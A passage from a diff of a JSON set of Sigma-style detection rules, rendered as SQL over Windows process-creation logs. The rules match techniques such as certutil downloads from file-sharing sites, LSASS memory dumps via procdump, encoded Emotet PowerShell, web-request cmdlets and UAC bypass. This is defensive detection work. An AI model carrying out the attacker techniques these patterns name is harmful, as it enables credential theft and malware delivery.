FTP.EXE Binary", + "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "status": "test", + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_lolbin_ftp.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rundll32 JS RunHTMLApplication Pattern", + "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "status": "test", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Active Directory Structure Export Via Ldifde.EXE", + "id": "4f7a6757-ff79-46db-9687-66501a02d9ec", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of \"ldifde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND CommandLine LIKE '%-f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_ldifde_export.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", + "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", + "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion" - ], - "falsepositives": [ - "Installation of unsigned packages for testing purposes" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" - }, - { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", - "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Files And Subdirectories Listing Using Dir", - "id": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "status": "experimental", - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "author": "frack113", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /b%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_dir_execution.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.persistence" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "status": "experimental", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", + "attack.persistence", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "PUA - NirCmd Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": 